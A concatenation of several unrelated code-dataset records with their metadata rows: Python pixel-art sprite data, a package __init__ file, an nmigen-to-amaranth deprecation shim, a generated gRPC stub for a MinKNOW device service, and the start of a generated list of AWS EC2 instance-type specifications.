[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
}
woman = {
'colors': [0, '000000', 'e0c29e', '585858', 'fdfdfd'],
'data': [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 3, 3, 2, 2, 2, 3, 3, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 2, 2, 1, 4, 2, 2, 2, 1, 4, 2, 2, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 1, 1, 1, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
}
cattle_DC = {
'colors': [0,"000000","81ffb7","ffffff","f0ff96","030500",'ecd993', '8af9ff',"fffeff","fafcfb"],
'data': [
[7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 1, 1, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 7, 1, 4, 4, 1, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7],
[7, 7, 7, 7, 7, 7, 1, 1, 1, 4, 4, 4, 4, 1, 1, 1, 7, 7, 7, 7, 7, 7, 7, 7],
[7, 1, 1, 7, 7, 1, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 1, 7, 7, 7, 7, 7, 7, 7],
[7, 1, 2, 1, 1, 2, 3, 3, 3, 3, 3, 4, 1, 1, 5, 5, 5, 1, 7, 7, 7, 7, 7, 7],
[7, 1, 2, 2, 1, 2, 2, 3, 1, 1, 1, 1, 7, 7, 1, 5, 5, 1, 7, 7, 7, 7, 7, 7],
[7, 7, 1, 2, 1, 2, 2, 1, 8, 8, 8, 8, 8, 8, 1, 5, 5, 1, 7, 7, 7, 7, 7, 7],
[7, 7, 1, 1, 2, 2, 1, 8, 8, 8, 8, 8, 8, 1, 5, 5, 5, 1, 7, 7, 7, 7, 7, 7],
[7, 7, 7, 1, 2, 2, 1, 8, 1, 1, 8, 8, 1, 5, 5, 5, 1, 7, 7, 7, 7, 7, 7, 7],
[7, 7, 7, 1, 2, 1, 8, 8, 1, 1, 8, 8, 8, 1, 1, 1, 6, 1, 7, 7, 1, 7, 7, 7],
[7, 7, 7, 7, 1, 8, 8, 8, 1, 1, 8, 8, 8, 1, 6, 6, 6, 1, 1, 1, 5, 1, 7, 7],
[7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 1, 6, 6, 6, 1, 1, 3, 3, 2, 1, 7, 7],
[7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 8, 1, 1, 1, 4, 4, 4, 3, 3, 1, 7, 7],
[7, 7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 1, 1, 8, 8, 8, 4, 4, 3, 1, 7, 7, 7],
[7, 7, 7, 7, 7, 7, 1, 1, 1, 1, 1, 1, 8, 8, 1, 1, 1, 1, 4, 1, 7, 7, 7, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 8, 1, 8, 1, 1, 7, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 8, 8, 1, 3, 3, 1, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 1, 2, 2, 1, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 1, 5, 1, 7],
[7, 7, 7, 7, 7, 7, 7, 1, 8, 1, 8, 8, 1, 1, 1, 1, 1, 1, 8, 8, 1, 6, 1, 7],
[7, 7, 7, 7, 7, 7, 7, 1, 2, 1, 5, 5, 1, 7, 7, 7, 1, 5, 1, 2, 2, 1, 1, 7],
[7, 7, 7, 7, 7, 7, 7, 1, 3, 1, 4, 4, 1, 7, 7, 7, 1, 4, 1, 3, 3, 1, 7, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 1, 1, 1, 1, 7, 7, 7, 7, 1, 1, 1, 1, 1, 1, 7, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7]
]
} | 69.483333 | 108 | 0.302551 | 3,487 | 12,507 | 1.084887 | 0.015199 | 0.676712 | 0.98414 | 1.270949 | 0.908538 | 0.894792 | 0.881311 | 0.860428 | 0.84166 | 0.824742 | 0 | 0.45346 | 0.377229 | 12,507 | 180 | 109 | 69.483333 | 0.032225 | 0.016471 | 0 | 0.389535 | 0 | 0 | 0.021962 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
41fc21a4532d435a2003135ff3d24c42f0b00d6e | 184 | py | Python | alpha_shape_analysis/__init__.py | StillEvan/alpha_shape_analysis | 196ee30d02871374a41b6091b314872cacacef8d | [
"MIT"
] | 1 | 2022-01-16T21:02:57.000Z | 2022-01-16T21:02:57.000Z | alpha_shape_analysis/__init__.py | StillEvan/alpha_shape_analysis | 196ee30d02871374a41b6091b314872cacacef8d | [
"MIT"
] | null | null | null | alpha_shape_analysis/__init__.py | StillEvan/alpha_shape_analysis | 196ee30d02871374a41b6091b314872cacacef8d | [
"MIT"
] | 1 | 2020-12-17T07:03:19.000Z | 2020-12-17T07:03:19.000Z | # __init__.py
from .simplex_property_determination import *
from .rejection_sampling import *
from .alpha_hull import *
from .alpha_heuristics import *
from .alpha_shape_main import * | 26.285714 | 45 | 0.815217 | 24 | 184 | 5.791667 | 0.583333 | 0.28777 | 0.323741 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119565 | 184 | 7 | 46 | 26.285714 | 0.858025 | 0.059783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
51188ad85db0f606ebb46fd1799c0c65b154bbe1 | 251 | py | Python | nmigen/compat/genlib/coding.py | psumesh/nmigen | 7d611b8fc1d9e58853ff268ec38ff8f4131a9774 | [
"BSD-2-Clause"
] | 528 | 2020-01-28T18:21:00.000Z | 2021-12-09T06:27:51.000Z | nmigen/compat/genlib/coding.py | DX-MON/nmigen | a6a13dd612ee1c9215719c70a5aa410a8775ffdb | [
"BSD-2-Clause"
] | 360 | 2020-01-28T18:34:30.000Z | 2021-12-10T08:03:32.000Z | nmigen/compat/genlib/coding.py | DX-MON/nmigen | a6a13dd612ee1c9215719c70a5aa410a8775ffdb | [
"BSD-2-Clause"
] | 100 | 2020-02-06T21:55:46.000Z | 2021-11-25T19:20:44.000Z | from amaranth.compat.genlib.coding import *
from amaranth.compat.genlib.coding import __all__
import warnings
warnings.warn("instead of nmigen.compat.genlib.coding, use amaranth.compat.genlib.coding",
DeprecationWarning, stacklevel=2)
| 31.375 | 90 | 0.780876 | 31 | 251 | 6.193548 | 0.516129 | 0.25 | 0.375 | 0.40625 | 0.375 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0.004587 | 0.131474 | 251 | 7 | 91 | 35.857143 | 0.876147 | 0 | 0 | 0 | 0 | 0 | 0.290837 | 0.227092 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
51477b87a4caa7493006e24ad4175d8de513b8ec | 7,401 | py | Python | porerefiner/protocols/minknow/rpc/device_grpc.py | CFSAN-Biostatistics/porerefiner | 64f96498bd6c036cfac46def1d9d94362001e67c | [
"MIT"
] | 8 | 2019-10-10T20:05:18.000Z | 2021-02-19T21:53:43.000Z | porerefiner/protocols/minknow/rpc/device_grpc.py | CFSAN-Biostatistics/porerefiner | 64f96498bd6c036cfac46def1d9d94362001e67c | [
"MIT"
] | 2 | 2020-07-17T07:24:17.000Z | 2021-02-19T22:28:12.000Z | porerefiner/protocols/minknow/rpc/device_grpc.py | CFSAN-Biostatistics/porerefiner | 64f96498bd6c036cfac46def1d9d94362001e67c | [
"MIT"
] | 2 | 2019-10-01T15:45:59.000Z | 2019-10-28T19:15:32.000Z | # Generated by the Protocol Buffers compiler. DO NOT EDIT!
# source: minknow/rpc/device.proto
# plugin: grpclib.plugin.main
import abc
import typing
import grpclib.const
import grpclib.client
if typing.TYPE_CHECKING:
import grpclib.server
from . import rpc_options_pb2
import google.protobuf.wrappers_pb2
from . import device_pb2
class DeviceServiceBase(abc.ABC):
@abc.abstractmethod
async def get_device_info(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.GetDeviceInfoRequest, minknow.rpc.device_pb2.GetDeviceInfoResponse]') -> None:
pass
@abc.abstractmethod
async def get_device_state(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.GetDeviceStateRequest, minknow.rpc.device_pb2.GetDeviceStateResponse]') -> None:
pass
@abc.abstractmethod
async def stream_device_state(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.StreamDeviceStateRequest, minknow.rpc.device_pb2.GetDeviceStateResponse]') -> None:
pass
@abc.abstractmethod
async def get_flow_cell_info(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.GetFlowCellInfoRequest, minknow.rpc.device_pb2.GetFlowCellInfoResponse]') -> None:
pass
@abc.abstractmethod
async def stream_flow_cell_info(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.StreamFlowCellInfoRequest, minknow.rpc.device_pb2.GetFlowCellInfoResponse]') -> None:
pass
@abc.abstractmethod
async def set_user_specified_flow_cell_id(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.SetUserSpecifiedFlowCellIdRequest, minknow.rpc.device_pb2.SetUserSpecifiedFlowCellIdResponse]') -> None:
pass
@abc.abstractmethod
async def set_user_specified_product_code(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.SetUserSpecifiedProductCodeRequest, minknow.rpc.device_pb2.SetUserSpecifiedProductCodeResponse]') -> None:
pass
@abc.abstractmethod
async def get_channels_layout(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.GetChannelsLayoutRequest, minknow.rpc.device_pb2.GetChannelsLayoutResponse]') -> None:
pass
def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
return {
'/ont.rpc.device.DeviceService/get_device_info': grpclib.const.Handler(
self.get_device_info,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.GetDeviceInfoRequest,
minknow.rpc.device_pb2.GetDeviceInfoResponse,
),
'/ont.rpc.device.DeviceService/get_device_state': grpclib.const.Handler(
self.get_device_state,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.GetDeviceStateRequest,
minknow.rpc.device_pb2.GetDeviceStateResponse,
),
'/ont.rpc.device.DeviceService/stream_device_state': grpclib.const.Handler(
self.stream_device_state,
grpclib.const.Cardinality.UNARY_STREAM,
minknow.rpc.device_pb2.StreamDeviceStateRequest,
minknow.rpc.device_pb2.GetDeviceStateResponse,
),
'/ont.rpc.device.DeviceService/get_flow_cell_info': grpclib.const.Handler(
self.get_flow_cell_info,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.GetFlowCellInfoRequest,
minknow.rpc.device_pb2.GetFlowCellInfoResponse,
),
'/ont.rpc.device.DeviceService/stream_flow_cell_info': grpclib.const.Handler(
self.stream_flow_cell_info,
grpclib.const.Cardinality.UNARY_STREAM,
minknow.rpc.device_pb2.StreamFlowCellInfoRequest,
minknow.rpc.device_pb2.GetFlowCellInfoResponse,
),
'/ont.rpc.device.DeviceService/set_user_specified_flow_cell_id': grpclib.const.Handler(
self.set_user_specified_flow_cell_id,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.SetUserSpecifiedFlowCellIdRequest,
minknow.rpc.device_pb2.SetUserSpecifiedFlowCellIdResponse,
),
'/ont.rpc.device.DeviceService/set_user_specified_product_code': grpclib.const.Handler(
self.set_user_specified_product_code,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.SetUserSpecifiedProductCodeRequest,
minknow.rpc.device_pb2.SetUserSpecifiedProductCodeResponse,
),
'/ont.rpc.device.DeviceService/get_channels_layout': grpclib.const.Handler(
self.get_channels_layout,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.GetChannelsLayoutRequest,
minknow.rpc.device_pb2.GetChannelsLayoutResponse,
),
}
class DeviceServiceStub:
    """Client-side stub for the ont.rpc.device.DeviceService gRPC service.

    Each attribute is a grpclib client method object bound to *channel*;
    calling it performs the corresponding RPC against the server.
    """

    def __init__(self, channel: grpclib.client.Channel) -> None:
        prefix = '/ont.rpc.device.DeviceService/'
        pb2 = minknow.rpc.device_pb2
        # (attribute name, client-method class, request type, response type)
        specs = (
            ('get_device_info', grpclib.client.UnaryUnaryMethod,
             pb2.GetDeviceInfoRequest, pb2.GetDeviceInfoResponse),
            ('get_device_state', grpclib.client.UnaryUnaryMethod,
             pb2.GetDeviceStateRequest, pb2.GetDeviceStateResponse),
            # Streaming call: server pushes state updates; reuses the
            # unary response message type, as in the generated original.
            ('stream_device_state', grpclib.client.UnaryStreamMethod,
             pb2.StreamDeviceStateRequest, pb2.GetDeviceStateResponse),
            ('get_flow_cell_info', grpclib.client.UnaryUnaryMethod,
             pb2.GetFlowCellInfoRequest, pb2.GetFlowCellInfoResponse),
            ('stream_flow_cell_info', grpclib.client.UnaryStreamMethod,
             pb2.StreamFlowCellInfoRequest, pb2.GetFlowCellInfoResponse),
            ('set_user_specified_flow_cell_id', grpclib.client.UnaryUnaryMethod,
             pb2.SetUserSpecifiedFlowCellIdRequest,
             pb2.SetUserSpecifiedFlowCellIdResponse),
            ('set_user_specified_product_code', grpclib.client.UnaryUnaryMethod,
             pb2.SetUserSpecifiedProductCodeRequest,
             pb2.SetUserSpecifiedProductCodeResponse),
            ('get_channels_layout', grpclib.client.UnaryUnaryMethod,
             pb2.GetChannelsLayoutRequest, pb2.GetChannelsLayoutResponse),
        )
        for attr, method_cls, request_type, response_type in specs:
            # Route name on the wire matches the attribute name exactly.
            setattr(self, attr,
                    method_cls(channel, prefix + attr, request_type, response_type))
| 47.748387 | 212 | 0.693555 | 732 | 7,401 | 6.760929 | 0.112022 | 0.118206 | 0.158416 | 0.18428 | 0.91271 | 0.88725 | 0.847444 | 0.764397 | 0.738331 | 0.601334 | 0 | 0.008859 | 0.222132 | 7,401 | 154 | 213 | 48.058442 | 0.85079 | 0.015809 | 0 | 0.533333 | 1 | 0.059259 | 0.246703 | 0.245604 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014815 | false | 0.059259 | 0.059259 | 0.007407 | 0.096296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
515bd2c59887c6e54f3f08fb3fa3b64a949e5974 | 119,786 | py | Python | ec2_compare/internal/instance_type/c.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | null | null | null | ec2_compare/internal/instance_type/c.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | null | null | null | ec2_compare/internal/instance_type/c.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | 1 | 2021-12-15T11:58:22.000Z | 2021-12-15T11:58:22.000Z |
# Automatically generated
# pylint: disable=all
get = [{'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'ValidCores': [1], 'ValidThreadsPerCore': [1], 'SizeInMiB': 2048, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.medium', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'ValidCores': [1], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'ValidCores': [1], 'ValidThreadsPerCore': [1], 'SizeInMiB': 2048, 'TotalSizeInGB': 59, 'Disks': [{'SizeInGB': 59, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 4, 
'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.medium', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'ValidCores': [1], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 59, 'Disks': [{'SizeInGB': 59, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['i386', 'x86_64'], 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1], 'SizeInMiB': 1740, 'TotalSizeInGB': 350, 'Disks': [{'SizeInGB': 350, 'Count': 1, 'Type': 'hdd'}], 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'c1.medium', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 
'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64']}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 1740}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 350, 'Disks': [{'SizeInGB': 350, 'Count': 1, 'Type': 'hdd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 3840, 'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 16, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.large', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 
3840}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 16, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 3840, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 
'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.large', 'CurrentGeneration': True, 